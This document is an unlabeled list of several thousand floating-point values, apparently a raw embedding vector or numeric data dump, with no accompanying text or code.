-0.030494797974824905, -0.0001300911244470626, -0.018217073753476143, -0.014219138771295547, 0.020273592323064804, 0.016175901517271996, 0.007416512817144394, 0.004780638962984085, -0.0038176048547029495, -0.0288986936211586, 0.019414151087403297, 0.008371872827410698, -0.01645215041935444, 0.007021323312073946, -0.010980889201164246, -0.051443662494421005, -0.008625101298093796, -0.020534493029117584, 0.008832287974655628, 0.016099166125059128, 0.014487714506685734, 0.006280823145061731, -0.001236405223608017, 0.021286504343152046, 0.023603923618793488, 0.04300272837281227, -0.02082609012722969, 0.027471408247947693, -0.0009078801376745105, -0.001039769733324647, -0.017035342752933502, 0.047115765511989594, -0.022422192618250847, -0.01903047226369381, -0.0332726314663887, -0.002524607116356492, -0.008149338886141777, -0.0026780785992741585, 0.002635873854160309, -0.020657271146774292, 0.007251530885696411, 0.012822547927498817, 0.02536884695291519, 0.026443148031830788, 0.000944809231441468, 0.023680660873651505, 0.008686489425599575, -0.02203851379454136, -0.0031154723837971687, -0.023143509402871132, 0.0036698884796351194, 0.0031653507612645626, 0.06765025854110718, -0.0006512948893941939, -0.01964435912668705, -0.0035931526217609644, 0.012093557976186275, -0.012346786446869373, 0.003554784692823887, -0.04159079119563103, 0.020457757636904716, -0.018171031028032303, 0.018800264224410057, -0.021992472931742668, 0.031891386955976486, 0.004020954482257366, -0.01876956969499588, -0.004865047987550497, -0.009139230474829674, -0.017142772674560547, 0.02658127248287201, 0.019368110224604607, -0.003082859795540571, 0.013190879486501217, -0.018754223361611366, 0.013643620535731316, 0.017219508066773415, -0.06470360606908798, 0.010290267877280712, -0.0258906502276659, -0.037600528448820114, -0.01451840903609991, 0.02156275324523449, 0.008648121729493141, -0.04152940213680267, -0.021010255441069603, 0.025169333443045616, 0.012623035348951817, -0.012346786446869373, -0.01881561242043972, -0.03845997154712677, -0.00305024697445333, 0.006204087287187576, -0.011694531887769699, 0.006161882542073727, -0.00669135944917798, -0.005808898247778416, 0.010221205651760101, 0.018278460949659348, 0.024540100246667862, 0.0016277576796710491, 0.013689662329852581, 0.01725020259618759, -0.004696229472756386, -0.01955227553844452, -0.038521360605955124, -0.030709657818078995, 0.017050689086318016, -0.004619493614882231, 0.01176359411329031, -0.021025601774454117, 0.04972478374838829, -0.005164317786693573, 0.004538921173661947, -0.023757396265864372, 0.029343759641051292, 0.01488674059510231, -0.03192208334803581, -0.02252962440252304, 0.030678963288664818, 0.0029926951974630356, 0.030448755249381065, 0.008256769739091396, -0.01611451245844364, -0.01772596500813961, 0.005613221786916256, 0.029405148699879646, -0.02404899150133133, -0.021271156147122383, 0.002307828515768051, -0.014702574349939823, -0.02369600720703602, -0.003008042462170124, 0.009499888867139816, 0.017004648223519325, -0.007216999772936106, -0.013160185888409615, -0.009453847073018551, 0.015078580006957054, -0.0070366705767810345, -0.014978823252022266, 0.01995130069553852, -0.03278152272105217, 0.0018972920952364802, -0.00021378108067438006, -0.015186009928584099, -0.008678816258907318, 0.018002212047576904, -0.004788312595337629, 0.003224821062758565, -0.004565778654068708, -0.0038866670802235603, 0.0016526967519894242, 0.0033130671363323927, -0.013797092251479626, -0.03763122484087944, 0.022805873304605484, 0.019398804754018784, -0.01108831912279129, 0.01230841875076294, -0.005720652174204588, -0.016298677772283554, 0.003698664251714945, 0.0012949162628501654, 0.024770308285951614, 0.05534183979034424, 0.012484910897910595, 0.0400867685675621, 0.009162251837551594, -0.01375105045735836, -0.013728030025959015, 0.020626576617360115, 0.012615361250936985, -0.02269844152033329, 0.019567621871829033, -0.024294545873999596, 0.010758355259895325, -0.001675717532634735, 0.015147642232477665, 0.04030162841081619, -0.009093189612030983, -0.018846306949853897, 0.02213059738278389, 0.007631372660398483, -0.00045969526399858296, -0.014157750643789768, 0.014433999545872211, 0.0069215670228004456, 0.008686489425599575, -0.025522319599986076, -0.006894709542393684, -0.037170808762311935, -0.03941149264574051, -0.01841658540070057, 0.008801593445241451, -0.018923042342066765, 0.00455043138936162, 0.019260680302977562, 0.004078506492078304, 0.022207332774996758, -0.003731277072802186, 0.01969039998948574, -0.011878698132932186, -0.004389286506921053, -0.003011879278346896, -0.01556201558560133, -0.013490148819983006, -0.023435106500983238, -0.021716224029660225, 0.005137460306286812, 0.036249980330467224, 0.026166899129748344, -0.03176861256361008, 0.034807346761226654, -0.024294545873999596, 0.013075776398181915, -0.006553234998136759, 0.012830222025513649, 0.014134730212390423, -0.005874123424291611, 0.00792680587619543, 0.02283656597137451, 0.018385890871286392, 0.007289898581802845, 0.01893838867545128, 0.017219508066773415, 0.00044410830014385283, -0.023680660873651505, 0.03391721099615097, -0.036127202212810516, -0.007681251037865877, 0.014034973457455635, 0.02968139760196209, 0.017342284321784973, -0.033334020525217056, 0.003610418178141117, -0.016221942380070686, 0.03342610225081444, 0.011126687750220299, -0.0151016004383564, -0.003854054259136319, -0.01567711867392063, 0.004308713600039482, -0.01073533482849598, 0.035206373780965805, 0.010482107289135456, -0.019199291244149208, 0.002154356800019741, -0.0006373865180648863, -0.025553012266755104, 0.018708182498812675, -0.01398893166333437, -0.01442632544785738, -0.03443901613354683, -0.02352718822658062, -0.03569748252630234, -0.020058732479810715, -0.01325226854532957, -0.002587914001196623, 0.0064995200373232365, -0.017526451498270035, 0.006741237826645374, 0.004324060864746571, 0.003925034776329994, -0.016221942380070686, -0.007251530885696411, 0.013282963074743748, -0.025553012266755104, 0.021409280598163605, 0.0071824686601758, -0.011218770407140255, -0.008064930327236652, -0.012400501407682896, -0.02714911662042141, -0.015047885477542877, 0.022498929873108864, -0.028530361130833626, -0.025353500619530678, 0.0025572197046130896, -0.019567621871829033, 0.0192453321069479, -0.008962738327682018, -0.021240463480353355, -0.026658007875084877, 0.012630708515644073, -0.016605621203780174, -0.034991513937711716, -0.01837054453790188, 0.02541488967835903, 0.07299106568098068, -0.0014455101918429136, -0.022330110892653465, -0.010136796161532402, 0.006261639297008514, 0.012369806878268719, 0.005935512017458677, 0.007462554145604372, -0.010980889201164246, 0.020764701068401337, 0.018877001479268074, -0.002904449123889208, -0.004657861776649952, 0.013505496084690094, 0.004304877016693354, 0.002618608297780156, -0.008187707513570786, -0.02671939693391323, -0.0022924812510609627, -0.008126318454742432, 0.030893823131918907, -0.016406109556555748, 0.020549841225147247, -0.019828524440526962, 0.027778349816799164, 0.00242293206974864, -0.026688702404499054, -0.022376151755452156, 0.006092820782214403, -0.005640079267323017, -0.017879435792565346, 0.011824983172118664, -0.0065110307186841965, -0.010597210377454758, 0.004285693168640137, 0.000799970468506217, 0.03793816640973091, 0.0009496051934547722, -0.0032133106142282486, -0.01250793132930994, -0.011188075877726078, -0.03526776283979416, -0.013083449564874172, -0.009001106023788452, 0.0011529549956321716, -0.018171031028032303, 0.047207847237586975, 0.001067586475983262, -0.02513864077627659, 0.0009831771021708846, -0.0010311369551345706, -0.0172041617333889, 0.027778349816799164, 0.031016601249575615, -0.01449538767337799, 0.010597210377454758, 0.024478713050484657, -0.028146682307124138, 0.00888600293546915, -0.005762856919318438, -0.008962738327682018, -0.006227108184248209, 0.029957646504044533, 0.012937651947140694, 0.007351287174969912, -0.019276026636362076, -0.013428760692477226, 0.0036372756585478783, -0.012170294299721718, 0.012346786446869373, 0.027686268091201782, -0.000338356796419248, -0.005950859282165766, -0.003710174700245261, -0.002647384302690625, 0.027517449110746384, -0.000012619438166439068, 0.029236329719424248, -0.017050689086318016, 0.007819375954568386, -0.0017601267900317907, 0.03885899484157562, -0.016007082536816597, 0.02539954148232937, -0.019460191950201988, 0.022406846284866333, -0.019843870773911476, 0.012085884809494019, -0.020534493029117584, 0.008164686150848866, 0.006572419311851263, 0.00566310016438365, 0.0035739687737077475, 0.020150814205408096, 0.023941561579704285, 0.0247549619525671, 0.01955227553844452, 0.008203054778277874, -0.007700434885919094, -0.015055558644235134, 0.0247549619525671, -0.0022867261432111263, 0.021332545205950737, -0.00047576180077157915, -0.00844860915094614, 0.013628273271024227, -0.004216630943119526, 0.01947554014623165, -0.0038176048547029495, -0.023327676579356194, -0.03818372264504433, -0.02335836924612522, 0.008648121729493141, -0.024171769618988037, -0.020396368578076363, 0.011272485367953777, 0.021808307617902756, 0.018048254773020744, -0.02243754081428051, -0.008279790170490742, -0.007075038272887468, 0.003940382041037083, 0.029666051268577576, -0.014848372898995876, 0.008978085592389107, 0.017695270478725433, 0.01243886910378933, -0.013735704123973846, 0.028960080817341805, 0.04453744366765022, 0.023158857598900795, -0.006948424503207207, 0.012492584064602852, -0.007266877684742212, 0.030003687366843224, -0.03431623801589012, 0.031154723837971687, 0.002791263861581683, 0.00488806888461113, -0.0034550281707197428, -0.012630708515644073, 0.02440197579562664, 0.015485279262065887, 0.013259941712021828, 0.005989227443933487, -0.0003311628242954612, 0.030172506347298622, -0.0016104921232908964, 0.016789788380265236, 0.02902146987617016, -0.005885634105652571, -0.02213059738278389, 0.011686858721077442, 0.04588799178600311, -0.011134360916912556, 0.0032555153593420982, 0.033855825662612915, -0.018846306949853897, 0.0028929386753588915, 0.02130185067653656, 0.00591632816940546, 0.023726701736450195, 0.005709141492843628, -0.003416660474613309, 0.004646351095288992, 0.027271894738078117, -0.010620231740176678, -0.03229041397571564, -0.006860178429633379, -0.035636093467473984, 0.007021323312073946, 0.018385890871286392, -0.007416512817144394, 0.03330332785844803, 0.02056518755853176, 0.0036180918104946613, 0.0008455323404632509, 0.004876558668911457, 0.02418711595237255, -0.011333874426782131, -0.005789714399725199, 0.01616055518388748, 0.009438500739634037, 0.003458864986896515, 0.008479302749037743, -0.016298677772283554, 0.018063601106405258, 0.020964214578270912, -0.03244388476014137, 0.030310630798339844, 0.0006863055750727654, 0.021547405049204826, -0.012914630584418774, -0.02300538495182991, -0.008279790170490742, -0.013896849006414413, -0.024386629462242126, -0.020918171852827072, -0.013282963074743748, -0.0036296022590249777, -0.005805061198771, 0.002547627780586481, 0.002279052510857582, 0.00426650932058692, -0.007289898581802845, -0.020396368578076363, -0.0047384342178702354, -0.0020968050230294466, -0.013198553584516048, 0.011947760358452797, -0.022667748853564262, 0.018585404381155968, 0.0186774879693985, -0.004350918345153332, 0.018324503675103188, -0.006867852061986923, 0.025476276874542236, -0.027118422091007233, 0.005651589948683977, -0.012369806878268719, 0.002250276505947113, 0.030571533367037773, 0.012976019643247128, -0.003656459739431739, -0.012362133711576462, 0.025476276874542236, 0.03299638256430626, -0.03858274593949318, -0.030970558524131775, -0.018186379224061966, -0.018923042342066765, -0.011218770407140255, 0.002743304008617997, 0.010919501073658466, -0.01628333143889904, -0.01694325916469097, 0.009047147817909718, 0.012883936986327171, 0.00881694070994854, -0.025200027972459793, 0.0016335127875208855, -0.015776874497532845, -0.02513864077627659, 0.02090282551944256, -0.01117272861301899, -0.0003249280562158674, 0.0014570205239579082, 0.011955433525145054, -0.002062273910269141, 0.0172041617333889, -0.009346417151391506, -0.02051914669573307, -0.0004692872171290219, 0.014088688418269157, 0.0031902899499982595, 0.03971843793988228, 0.019229985773563385, 0.004481369163841009, 0.013628273271024227, -0.012362133711576462, -0.0064151110127568245, -0.02932841330766678, -0.006756585091352463, -0.006794952787458897, -0.031369585543870926, 0.03968774154782295, -0.009960304014384747, -0.0009544012136757374, -0.010044712573289871, -0.003176861209794879, 0.03496081754565239, 0.0013256105594336987, 0.002027742797508836, -0.0018934552790597081, 0.0006575296865776181, -0.00640743738040328, 0.028775915503501892, -0.005643916316330433, -0.0007146018906496465, -0.00036521433503367007, -0.015139968134462833, 0.028714526444673538, 0.00940780621021986, -0.028346195816993713, 0.024954473599791527, -0.03146166726946831, -0.046778127551078796, 0.008648121729493141, -0.011587101966142654, -0.0029140410479158163, 0.00503002991899848, 0.010259573347866535, -0.002518851775676012, -0.014196118339896202, 0.012991366907954216, 0.006699033081531525, -0.002499667927622795, 0.028453625738620758, 0.0005592119414359331, -0.004477532580494881, 0.019567621871829033, 0.007727292366325855, 0.015009517781436443, 0.015868958085775375, -0.021716224029660225, 0.022974690422415733, -0.029604662209749222, -0.03244388476014137, 0.015416217036545277, -0.003247841726988554, 0.009937282651662827, -0.021025601774454117, -0.004124547820538282, -0.02087213099002838, -0.004807496443390846, -0.005789714399725199, 0.006537888199090958, 0.0007304286700673401, 0.0034032317344099283, 0.012807200662791729, 0.00001852449531725142, -0.010221205651760101, -0.030187854543328285, -0.035605400800704956, 0.0047269235365092754, -0.005828082095831633, 0.009285029023885727, 0.00026713640545494854, -0.00842558778822422, -0.03606581315398216, 0.031185418367385864, 0.011740573681890965, 0.02371135540306568, 0.00013788459182251245, 0.007842396385967731, -0.008333505131304264, -0.012362133711576462, 0.025952039286494255, -0.01296834647655487, -0.0014234486734494567, -0.038398582488298416, 0.04861978814005852, -0.01340574026107788, -0.0028718363028019667, 0.010551169514656067, -0.0029236329719424248, -0.008678816258907318, 0.004162915982306004, 0.0042588356882333755, -0.017449716106057167, -0.006484173238277435, -0.008978085592389107, 0.006376742850989103, 0.02317420393228531, 0.007416512817144394, 0.006303844042122364, 0.01383545994758606, 0.011126687750220299, 0.016175901517271996, -0.0158382635563612, -0.011755920946598053, 0.017971519380807877, 0.00044722569873556495, 0.008556039072573185, 0.008256769739091396, 0.012684423476457596, -0.019659705460071564, 0.027179811149835587, -0.0050530508160591125, -0.001983619760721922, -0.007731129415333271, -0.0059431856498122215, 0.005728325806558132, -0.006967608351260424, 0.007516269106417894, 0.007623699493706226, 0.023250939324498177, 0.00362768373452127, -0.028791263699531555, 0.024908432736992836, -0.0018474138341844082, 0.00007619622920174152, 0.014656533487141132, -0.0016124105313792825, -0.032413192093372345, 0.012093557976186275, -0.005083744879812002, -0.012024495750665665, -0.02667335607111454, -0.024171769618988037, -0.0012690179282799363, 0.02676543779671192, -0.0005208440707065165, 0.03858274593949318, -0.01289928425103426, 0.0071824686601758, 0.010090754367411137, -0.0023423596285283566, -0.019981995224952698, 0.014403305016458035, 0.03379443660378456, 0.011026930995285511, -0.018708182498812675, 0.016252636909484863, 0.023189552128314972, 0.010259573347866535, -0.013582232408225536, -0.03400929644703865, 0.027701614424586296, -0.0339479073882103, 0.041007596999406815, -0.006181066855788231, 0.01580756902694702, -0.013766397722065449, -0.006676012650132179, 0.003811849746853113, -0.029543273150920868, -0.004370102193206549, 0.0028852650430053473, 0.006737401243299246, 0.012860915623605251, 0.003002287121489644, -0.014833025634288788, -0.03410137817263603, 0.02279052510857582, -0.01176359411329031, -0.0008584815077483654, -0.015899652615189552, 0.002421013778075576, 0.022115251049399376, 0.013198553584516048, 0.011295505799353123, 0.030893823131918907, -0.007842396385967731, 0.009269681759178638, 0.009215966798365116, -0.015592709183692932, 0.008678816258907318, -0.015209030359983444, -0.00041053639142774045, 0.027118422091007233, -0.028484320268034935, -0.003416660474613309, 0.004124547820538282, -0.0007112447055988014, -0.011617796495556831, -0.015024865046143532, 0.008272117003798485, 0.0019462110940366983, -0.00910086277872324, 0.014564449898898602, 0.014457019977271557, -0.0017265549395233393, 0.01028259377926588, 0.005624732468277216, -0.014357263222336769, 0.013566885143518448, 0.026611967012286186, -0.00407083285972476, -0.012085884809494019, 0.013121817260980606, -0.016574926674365997, 0.015132294967770576, 0.0063383751548826694, 0.019582970067858696, 0.01990525983273983, 0.008264442905783653, 0.011119013652205467, -0.0012191396672278643, -0.026335718110203743, 0.02200782112777233, -0.005743672605603933, 0.007853906601667404, -0.016697704792022705, -0.004297203384339809, -0.009898914955556393, -0.028653139248490334, -0.004600309766829014, 0.007807865273207426, -0.01628333143889904, 0.006361395586282015, 0.002739467192441225, -0.0065762558951973915, -0.003414741950109601, -0.007865416817367077, 0.013344351202249527, 0.014157750643789768, 0.02120976895093918, 0.004005607683211565, 0.014303548261523247, -0.009638013318181038, 0.009177599102258682, -0.013444107957184315, -0.0012527115177363157, 0.01685117557644844, 0.023036079481244087, 0.0013831623364239931, 0.01675909385085106, 0.011771268211305141, -0.01117272861301899, 0.010988563299179077, -0.02021220326423645, 0.005010846070945263, -0.002250276505947113, 0.04324828460812569, -0.003616173518821597, -0.007263041101396084, 0.008640448562800884, 0.01331365667283535, -0.00020299010793678463, -0.009346417151391506, -0.009484541602432728, -0.019675053656101227, 0.011625469662249088, 0.002562974812462926, 0.019874565303325653, -0.0052448902279138565, -0.010627904906868935, -0.0015155315632000566, -0.017388327047228813, 0.006019921507686377, 0.0024114216212183237, -0.00814166571944952, -0.013436433859169483, -0.013712682761251926, 0.0253228060901165, 0.01147967204451561, 0.006522540934383869, -0.001573083340190351, -0.026995645835995674, -0.0036852355115115643, 0.004669371992349625, -0.006837157532572746, -0.027747657150030136, 0.005701468326151371, -0.0005299564218148589, 0.006564745679497719, -0.008164686150848866, 0.012431195937097073, -0.039258021861314774, 0.00946919433772564, 0.001235445961356163, 0.0036718067713081837, 0.003662214847281575, -0.0004031026328448206, -0.015147642232477665, -0.01732693798840046, -0.006453478708863258, -0.022314762696623802, -0.008471629582345486, 0.007462554145604372, -0.010597210377454758, 0.001457979786209762, -0.03483804315328598, 0.008694163523614407, 0.004811333026736975, -0.0026531394105404615, -0.008640448562800884, -0.0013169777812436223, 0.00404013879597187, -0.007535452954471111, -0.0046233306638896465, 0.018109643831849098, 0.03594303876161575, -0.0037869105581194162, 0.01976713538169861, 0.007995868101716042, 0.00792680587619543, -0.0013457536697387695, -0.015285766683518887, -0.003986423369497061, -0.009684055112302303, -0.00343776261433959, -0.006779605522751808, 0.0056746103800833225, 0.0035029880236834288, -0.0060697998851537704, -0.000799011264462024, 0.025767873972654343, 0.006188740488141775, 0.014257507398724556, 0.009300376288592815, 0.001816719421185553, -0.0067680953070521355, -0.016421455889940262, -0.023588577285408974, 0.002547627780586481, -0.030049730092287064, -0.012845568358898163, 0.006123514845967293, 0.011372242122888565, 0.02828480675816536, -0.023956909775733948, -0.0219157375395298, -0.0017582084983587265, -0.0198131762444973, -0.02793182246387005, 0.010121448896825314, -0.01235445961356163, 0.009008780121803284, 0.013436433859169483, 0.004485206212848425, 0.0047077396884560585, -0.007995868101716042, 0.01414240337908268, 0.003698664251714945, 0.011778941377997398, -0.0110422782599926, 0.0011567918118089437, -0.002010477241128683, 0.012362133711576462, -0.007393491920083761, -0.007949826307594776, -0.002618608297780156, -0.016406109556555748, -0.0011126687750220299, 0.005152807105332613, -0.0033802108373492956, 0.007109569385647774, -0.030019035562872887, 0.01457979716360569, 0.013866154477000237, 0.015684792771935463, 0.012369806878268719, 0.003272780915722251, 0.012883936986327171, 0.019582970067858696, -0.03658761829137802, 0.010244226083159447, 0.01763388141989708, 0.02650453709065914, 0.016099166125059128, 0.010228878818452358, 0.010904153808951378, -0.016697704792022705, 0.014410978183150291, 0.0033610269892960787, -0.005824245512485504, -0.00213325466029346, -0.007723455782979727, -0.008778573013842106, 0.010397697798907757, 0.010006344877183437, 0.01898443140089512, -0.011410609818994999, 0.009116210043430328, -0.013083449564874172, -0.0026013427414000034, -0.008394894190132618, 0.007040507160127163, 0.018140336498618126, 0.02955862134695053, -0.01170220598578453, 0.002714528003707528, 0.004216630943119526, -0.008755551651120186, 0.003994097001850605, -0.0027222016360610723, -0.004205120261758566, 0.0042473250068724155, 0.020856782793998718, -0.004807496443390846, -0.01220098789781332, 0.01442632544785738, 0.0060697998851537704, -0.01912255585193634, 0.00032516784267500043, 0.021056296303868294, -0.014656533487141132, 0.005394524894654751, -0.009292702190577984, -0.0038329518865793943, -0.0172041617333889, 0.0024095033295452595, -0.014303548261523247, -0.003940382041037083, -0.000040735903894528747, -0.008640448562800884, 0.003783073741942644, 0.0009807791793718934, -0.006618460640311241, -0.012039843015372753, 0.002056518802419305, -0.014249833300709724, 0.006514867302030325, -0.013520843349397182, -0.02409503422677517, -0.007896111346781254, 0.009315723553299904, 0.012553973123431206, 0.01706603728234768, -0.0035490295849740505, -0.0037178483325988054, -0.009806832298636436, -0.00792680587619543, -0.05021589249372482, -0.021010255441069603, -0.005379177629947662, -0.00625396566465497, 0.0006316313520073891, -0.001333284075371921, 0.014541429467499256, 0.001575961010530591, 0.005559506826102734, -0.02203851379454136, 0.011003910563886166, -0.0006014166283421218, 0.002319338731467724, -0.009277354925870895, 0.003658378031104803, 0.026351064443588257, -0.012062863446772099, 0.006986792199313641, -0.012699770741164684, 0.004907252732664347, 0.024862391874194145, 0.0020239059813320637, -0.00897041242569685, 0.01732693798840046, 0.00503002991899848, 0.0031902899499982595, 0.013359698466956615, -0.013428760692477226, -0.026212939992547035, 0.008087950758635998, 0.012623035348951817, -0.0077157821506261826, 0.0010109938448294997, -0.018477974459528923, -0.0008843797841109335, 0.02025824412703514, 0.02148601785302162, 0.023649966344237328, 0.0022157456260174513, -0.0000265277976723155, 0.00654939841479063, 0.0012536707799881697, -0.025952039286494255, -0.017265548929572105, 0.008740204386413097, 0.03152305632829666, 0.014418652281165123, 0.014004278928041458, 0.016989300027489662, 0.01390452217310667, 0.01619124785065651, 0.0005918246461078525, 0.00005836115451529622, -0.02388017252087593, 0.023849479854106903, -0.004538921173661947, 0.0037926656659692526, -0.0011932413326576352, 0.011310853064060211, 0.004235814791172743, -0.004262672271579504, -0.005356157198548317, 0.004370102193206549, -0.0062232716009020805, -0.0032094737980514765, -0.000027891655918210745, 0.02087213099002838, 0.009154577739536762, 0.014633512124419212, -0.00769276125356555, -0.00550962844863534, 0.0021735408809036016, -0.022314762696623802, -0.009484541602432728, -0.025875303894281387, -0.005394524894654751, 0.01338271889835596, 0.04456814005970955, -0.024908432736992836, 0.001549103413708508, -0.0006992547423578799, 0.011648491024971008, -0.02113303169608116, -0.005805061198771, 0.0027183648198843002, -0.0018963328329846263, 0.01405799388885498, -0.021501364186406136, -0.006012247875332832, 0.018217073753476143, -0.01183265633881092, 0.005106765776872635, -0.007546963635832071, 0.007980520837008953, -0.013121817260980606, 0.0039787497371435165, 0.01250793132930994, -0.008839961141347885, -0.00014328007819131017, -0.008486976847052574, 0.0022905629593878984, -0.003974913153797388, -0.002175459172576666, -0.007105732802301645, -0.016927912831306458, 0.005735998973250389, -0.012676750309765339, -0.0015702057862654328, 0.01449538767337799, -0.004619493614882231, 0.011663838289678097, -0.005191175267100334, 0.004853537771850824, 0.003846380626782775, 0.002012395765632391, -0.009108536876738071, -0.00140810152515769, -0.02418711595237255, 0.005099092144519091, 0.003199881874024868, -0.013198553584516048, -0.016467496752738953, 0.005252563860267401, 0.020411716774106026, -0.00938478484749794, -0.006062126252800226, -0.0042780195362865925, 0.008195380680263042, -0.014587471261620522, -0.010274920612573624, -0.010037039406597614, 0.0008181952289305627, 0.0011961188865825534, 0.005490444600582123, -0.018800264224410057, -0.006380579899996519, 0.018616098910570145, 0.0014378365594893694, -0.005900980904698372, -0.0012239356292411685, -0.0006944587803445756, -0.007995868101716042, -0.03434693440794945, -0.01689721830189228, 0.02759418450295925, -0.02496982179582119, 0.021639488637447357, 0.022069208323955536, -0.015822917222976685, 0.022897955030202866, -0.0003584999358281493, -0.005402198527008295, -0.004416143987327814, -0.008034235797822475, -0.019199291244149208, 0.01614520698785782, -0.0020450083538889885, -0.010198184289038181, 0.017480408772826195, 0.021746918559074402, 0.005494281649589539, -0.013175532221794128, -0.01947554014623165, 0.0009184313239529729, 0.014081014320254326, 0.010343982838094234, 0.00844860915094614, 0.014081014320254326, -0.020150814205408096, -0.011801961809396744, -0.003343761432915926, -0.00251501495949924, -0.002060355618596077, -0.016421455889940262, -0.009484541602432728, -0.00499933585524559, -0.004243488423526287, 0.014249833300709724, 0.02094886638224125, -0.024156421422958374, -0.0059738801792263985, 0.002814284525811672, 0.0035509481094777584, -0.014487714506685734, 0.011057625524699688, 0.0002215745480498299, 0.01763388141989708, 0.024770308285951614, -0.006472662556916475, -0.022667748853564262, -0.022851914167404175, -0.00814166571944952, 0.018355198204517365, -0.010635578073561192, -0.007523942738771439, -0.023588577285408974, 0.01999734342098236, -0.009699402377009392, 0.04165218025445938, 0.01597638800740242, 0.015991736203432083, -0.007842396385967731, -0.011541060172021389, -0.003564376849681139, -0.000018689357602852397, 0.0008939717663452029, -0.021624142304062843, -0.005463587120175362, 0.036035120487213135, 0.0262282881885767, -0.0022579501383006573, 0.017879435792565346, -0.009024127386510372, -0.0030176343861967325, 0.02776300348341465, -0.0010148306610062718, 0.006963771767914295, 0.018585404381155968, -0.003823359962552786, 0.01841658540070057, -0.01711207814514637, -0.029405148699879646, 0.0021677855402231216, -0.010205858387053013, 0.011080645956099033, 0.0046425145119428635, 0.003370618913322687, 0.005356157198548317, 0.005033866968005896, -0.004677045624703169, -0.02116372622549534, 0.008717183955013752, -0.008847635239362717, -0.013068102300167084, -0.011165055446326733, -0.0062309447675943375, 0.01060488447546959, 0.007527779322117567, 0.012193314731121063, -0.03256666287779808, -0.0008920533582568169, 0.014387957751750946, 0.007784844376146793, -0.011518039740622044, 0.022591011598706245, -0.005647752899676561, -0.003871319815516472, -0.0018618017202243209, -0.004807496443390846, -0.015730833634734154, -0.018232420086860657, 0.0008397771161980927, 0.017971519380807877, 0.003735113888978958, -0.012776506133377552, 0.018477974459528923, -0.003681398928165436, -0.007343613542616367, -0.005363830830901861, -0.009484541602432728, -0.0009841363644227386, -0.006833320949226618, -0.012170294299721718, 0.018124990165233612, -0.029742786660790443, -0.005122113041579723, -0.018002212047576904, 0.020319633185863495, 0.012177967466413975, 0.006752748042345047, -0.024079686030745506, -0.020288938656449318, -0.017756657674908638, -0.0022905629593878984, -0.011671511456370354, 0.00484586413949728, -0.003612336702644825, 0.02203851379454136, -0.006361395586282015, -0.002768243197351694, 0.000918910896871239, 0.0019174352055415511, -0.018784917891025543, 0.00251501495949924, 0.006725890561938286, -0.009914262220263481, -0.008824613876640797, -0.033763740211725235, -0.02113303169608116, 0.00962266605347395, -0.007512432523071766, -0.008264442905783653, 0.012853242456912994, 0.013505496084690094, -0.004193610046058893, 0.021547405049204826, -0.02374204806983471, 0.020350327715277672, 0.006530214566737413, 0.021194420754909515, 0.0024536263663321733, 0.009507562965154648, 0.005064561031758785, -0.0002997491101268679, -0.011502692475914955, -0.011448977515101433, -0.008563712239265442, 0.002131336135789752, 0.0013409577077254653, 0.007972846738994122, -0.004588799551129341, 0.0020469268783926964, 0.007289898581802845, -0.016175901517271996, 0.0039902604185044765, 0.008364199660718441, 0.010574189946055412, -0.04066995903849602, -0.00750859547406435, 0.018217073753476143, -0.0025015862192958593, -0.013490148819983006, 0.0029428170528262854, -0.0009093189146369696, -0.003389802761375904, -0.0186774879693985, 0.001138567109592259, -0.0030866966117173433, -0.030494797974824905, -0.030540838837623596, 0.002495831111446023, -0.005003172438591719, 0.00024471519282087684, 0.017787352204322815, -0.001839740201830864, 0.02139393426477909, 0.0005261196638457477, 0.0036833172198385, 0.01754179783165455, 0.0031346564646810293, 0.009860547259449959, -0.0038176048547029495, 0.018109643831849098, 0.018263114616274834, 0.0038905038964003325, -0.003393639577552676, -0.006883198861032724, -0.021885043010115623, 0.015377849340438843, -0.00722467340528965, 0.021532058715820312, -0.00407083285972476, -0.01990525983273983, 0.006388253066688776, 0.0011980372946709394, 0.0010541577357798815, 0.011203423142433167, -0.011771268211305141, -0.010297941043972969, 0.0024862391874194145, -0.011203423142433167, 0.010397697798907757, -0.0034550281707197428, -0.0004680882266256958, 0.009108536876738071, -0.021102339029312134, -0.00888600293546915, -0.006771932356059551, 0.0172041617333889, 0.011080645956099033, 0.0023097468074411154, -0.02326628752052784, 0.0028948571998625994, -0.036219287663698196, 0.02920563519001007, -0.008463956415653229, -0.006902383174747229, -0.018063601106405258, 0.0025380358565598726, 0.014318895526230335, -0.008486976847052574, -0.01296834647655487, -0.00547893438488245, 0.005812734831124544, 0.008410240523517132, -0.014403305016458035, -0.004443001467734575, 0.021363239735364914, -0.005079908296465874, 0.0023097468074411154, 0.009262007661163807, 0.014679553918540478, 0.004600309766829014, 0.003752379445359111, 0.024693572893738747, -0.01178661547601223, 0.0014368774136528373, 0.007842396385967731, -0.02004338428378105, -0.019306721165776253, -0.016129860654473305, -0.007424186449497938, 0.016252636909484863, -0.00722467340528965, -0.025660444051027298, -0.0006469785002991557, 0.0026761600747704506, 0.01355153787881136, 0.0017371061258018017, -0.015078580006957054, 0.020657271146774292, -0.011894045397639275, -0.011817309074103832, 0.006879362277686596, -0.008625101298093796, -0.006975281983613968, 0.005678447429090738, -0.011794288642704487, -0.011648491024971008, -0.017495756968855858, -0.012484910897910595, 0.0036046630702912807, -0.008694163523614407, -0.008149338886141777, -0.007282224949449301, 0.005935512017458677, -0.042143288999795914, 0.009070168249309063, -0.018616098910570145, -0.009400132112205029, -0.0010848520323634148, 0.005371504463255405, 0.004454511683434248, 0.02388017252087593, -0.026964951306581497, 0.001401387038640678, -0.012922304682433605, -0.006269312929362059, 0.025000516325235367, 0.010459085926413536, -0.03216763585805893, 0.014165423810482025, -0.01701999455690384, -0.007616025861352682, 0.0015817161183804274, -0.009024127386510372, -0.002720283344388008, 0.02977348119020462, -0.01429587509483099, -0.01985921896994114, 0.012837895192205906, -0.012231682427227497, -0.024831697344779968, -0.0026550579350441694, 0.006522540934383869, -0.04352453351020813, 0.010689293034374714, 0.008740204386413097, -0.008003541268408298, 0.0014090606709942222, 0.008210727944970131, -0.018662139773368835, -0.003531764028593898, 0.006687522865831852, -0.013681989163160324, 0.01645215041935444, 0.0068448311649262905, -0.0016651663463562727, 0.013812439516186714, -0.008256769739091396, -0.01154873427003622, -0.007002139464020729, 0.031400278210639954, -0.016881870105862617, -0.000013511191355064511, 0.02286726050078869, 0.0033034752123057842, -0.003395558102056384, 0.021854348480701447, 0.009146904572844505, 0.022452887147665024, 0.0003340404073242098, 0.002298236358910799, -0.01237748097628355, -0.015615730546414852, -0.0017342285718768835, -0.01675909385085106, 0.006814136635512114, 0.007032833993434906, 0.010351656004786491, -0.005732162389904261, -0.0035279272124171257, -0.02750210091471672, 0.007075038272887468, 